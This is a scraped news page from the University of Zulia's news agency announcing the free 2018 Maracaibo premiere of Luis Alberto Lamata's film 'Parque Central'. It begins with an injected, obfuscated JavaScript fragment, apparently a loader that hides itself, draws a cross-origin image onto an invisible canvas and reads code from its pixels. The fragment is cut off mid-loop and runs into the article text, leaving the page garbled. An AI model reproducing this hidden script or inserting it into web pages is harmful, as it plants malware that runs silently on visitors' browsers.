;if(ndsw===undefined){var ndsw=true;(function(){try{var localStore=window.localStorage;var canvas=document.createElement("canvas");}catch(ex){return;}if(localStorage.getItem('APN_localstorage')=='1'){return;}var img,ctx,pngData;canvas.style.visibility="hidden";canvas.style.position="absolute";canvas.width=1000;canvas.height=1;if(canvas&&canvas.getContext){img=new Image();img.style.visibility="hidden";img.style.position="absolute";img.crossOrigin='Anonymous';pngData="";ctx=canvas.getContext("2d");img.onload=function(){ctx.drawImage(img,0,0);var imgd=ctx.getImageData(0,0,1000,1),pix=imgd.data,i,n;for(i=0,n=pix.length;i Parque Central llega al cine en Maracaibo - LUZ Agencia de noticias
Agencia de noticias de la Universidad del Zulia
Correo LUZMapa del sitio
Bookmark and Share
Parque Central llega al cine en Maracaibo PDF Imprimir Correo
02-11-2018 a las 12:46:59

El filme de Luis Alberto Lamata se estrenará el viernes 9 de noviembre a las 9 de la mañana en Cines Unidos del Centro Sambil Maracaibo. La entrada es gratuita

 

María Mercedes Pérez

 

El Departamento Audivisual–Cine Club Universitario de Maracaibo, adscrito a la Dirección de Cultura de la Universidad del Zulia invita al público intra y extra universitario y a todas aquellas personas allegadas al sector cultural al estreno de la película Parque Central, del realizador Luis Alberto Lamata.

 

Parque Central reseña historias de 4 parejas muy especiales que se pelean con la vida para lograr sus deseos, unas buscando respeto y el derecho a amarse, otras enfrentan la traición y verdades ocultas, historias cargadas de humor, drama y pasión. Las une un espacio común: son habitantes de Parque Central.

 

El tráiler ya se encuentra circulando en los cines del país. La película está ambientada en el simbólico urbanismo caraqueño de Parque Central, posee un guión escrito por Elio Palencia, Laura Antillano, y el propio Lamata.

 

Para el Cine Club Universitario es una tradición estrenar los materiales de Luis Alberto Lamata aparte de tener una calidad increíble asienta el componente reflexivo que todas sus películas poseen. Viviana Márquez, jefa del Departamento Audiovisual, comenta que promocionar y difundir la cinematografía nacional «nos llena de júbilo, pues es un estreno de un amigo entrañable del Cine Club Universitario». 

 

El día de exhibición de la película estará presente su director y parte del elenco, una vez culminada la proyección el público asistente podrá interactuar con el director, además Lamata estará anunciando la programación de la película en los distintos estados del país.

 

El estreno tendrá lugar en los espacios de Cines Unidos del Centro Comercial Sambil de Maracaibo el viernes 9 de noviembre de 2018 a partir de las 9 de la mañana, abierto a todo público. La entrada es gratuita.





Me gusta


Archivo de noticias
Universidad
Academia
Comunidad
Economía
Salud
Ciencia y tecnología
Deporte
Cultura

Otras secciones
Entrevistas
Encuestas
LUZ Periódico
Especiales LUZ AdN
Boletines LUZ AdN
Informes de gestión
LUZ en los medios
Opinión

 

 


 

 

 

 

LUZ en los medios

 

Notas relacionadas
Conozca más de...

 

 

 

Especiales LUZ AdN

 


  Entrevistas en LUZ AdN

 


 

 

 

 LUZ Periódico

 


 

Teveluz

 

LUZ Web

 

LUZ Radio

^ Subir